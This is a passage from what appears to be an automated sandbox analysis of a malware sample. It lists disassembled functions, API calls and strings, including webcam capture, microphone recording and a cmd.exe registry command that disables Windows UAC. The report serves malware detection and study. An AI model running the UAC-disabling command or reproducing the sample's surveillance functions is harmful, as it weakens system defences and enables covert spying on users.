                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                          • API String ID: 2922976086-4183131282
                                                                                          • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                                          • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                                                                          • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                                          • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                                                                          Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                                          • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                                                                          • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                                          • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                                                                          Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          Strings
                                                                                          • Connection KeepAlive | Disabled, xrefs: 004050D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                          • String ID: Connection KeepAlive | Disabled
                                                                                          • API String ID: 2993684571-3818284553
                                                                                          • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                                                                          • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                                                                          • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                                                                          • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                                                                          Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                                                                          • Sleep.KERNEL32(00002710), ref: 00418DBD
                                                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                          • String ID: Alarm triggered
                                                                                          • API String ID: 614609389-2816303416
                                                                                          • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                                                                          • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                                                                          • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                                                                          • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                                                                          Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                                                                          • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                                                                          • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                                                                          • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                                                                          Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,?), ref: 004044A4
                                                                                            • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologSleep
                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                          • API String ID: 3469354165-3547787478
                                                                                          • Opcode ID: cf4fac54dc614f6b24d057e9d973ce543428a8baf8f9bf4efbfe368f6e52cd5d
                                                                                          • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                                                                          • Opcode Fuzzy Hash: cf4fac54dc614f6b24d057e9d973ce543428a8baf8f9bf4efbfe368f6e52cd5d
                                                                                          • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                                                                          Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          • _free.LIBCMT ref: 00442318
                                                                                          • _free.LIBCMT ref: 0044232F
                                                                                          • _free.LIBCMT ref: 0044234E
                                                                                          • _free.LIBCMT ref: 00442369
                                                                                          • _free.LIBCMT ref: 00442380
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3033488037-0
                                                                                          • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                                                                          • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                                                                          • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                                                                          • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                                                                          Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                                          • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                                                                          • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                                          • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                                                                          Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                                                                                          • __alloca_probe_16.LIBCMT ref: 0044E391
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                                                                                          • __freea.LIBCMT ref: 0044E3FD
                                                                                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                          • String ID:
                                                                                          • API String ID: 313313983-0
                                                                                          • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                                                                          • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                                                                          • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                                                                          • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                                                                          Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                                                                          • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                                                                          • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                                                                          • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                                                                          • waveInStart.WINMM ref: 00401CDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                          • String ID:
                                                                                          • API String ID: 1356121797-0
                                                                                          • Opcode ID: 3b58d0c680de98a2238f286cb7f614a66765342de8d6d8e6ba78ff9c64c57b7c
                                                                                          • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                                                                          • Opcode Fuzzy Hash: 3b58d0c680de98a2238f286cb7f614a66765342de8d6d8e6ba78ff9c64c57b7c
                                                                                          • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                                                                          Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                                                                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                                                                          • _free.LIBCMT ref: 0044C59F
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                                                                          • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                                                                          • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                                                                          • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                                                                          Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                                                          • String ID:
                                                                                          • API String ID: 1852769593-0
                                                                                          • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                                          • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                                                                          • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                                          • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                                                                          Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                                                                          • int.LIBCPMT ref: 0040FBE8
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                          • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                          • String ID:
                                                                                          • API String ID: 2536120697-0
                                                                                          • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                                                                          • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                                                                          • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                                                                          • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                                                                          Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0044DBB4
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 0044DBC6
                                                                                          • _free.LIBCMT ref: 0044DBD8
                                                                                          • _free.LIBCMT ref: 0044DBEA
                                                                                          • _free.LIBCMT ref: 0044DBFC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                                          • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                                                                          • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                                          • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                                                                          Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00441566
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 00441578
                                                                                          • _free.LIBCMT ref: 0044158B
                                                                                          • _free.LIBCMT ref: 0044159C
                                                                                          • _free.LIBCMT ref: 004415AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                                          • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                                                                          • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                                          • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                                                                          Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Enum$InfoQueryValue
                                                                                          • String ID: [regsplt]
                                                                                          • API String ID: 3554306468-4262303796
                                                                                          • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                                                                          • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                                                                          • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                                                                          • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                                                                          Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __alloca_probe_16__freea
                                                                                          • String ID: H"G$H"GH"G
                                                                                          • API String ID: 1635606685-3036711414
                                                                                          • Opcode ID: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
                                                                                          • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                                                                          • Opcode Fuzzy Hash: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
                                                                                          • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                                                                          Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040189E
                                                                                          • ExitThread.KERNEL32 ref: 004018D6
                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                                                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                          • String ID: 8:G
                                                                                          • API String ID: 1649129571-405301104
                                                                                          • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                                                                          • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                                                                          • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                                                                          • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                                                                          Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe,00000104), ref: 00440975
                                                                                          • _free.LIBCMT ref: 00440A40
                                                                                          • _free.LIBCMT ref: 00440A4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                          • API String ID: 2506810119-1153660456
                                                                                          • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                                          • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                                                                          • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                                          • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                                                                          Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                            • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
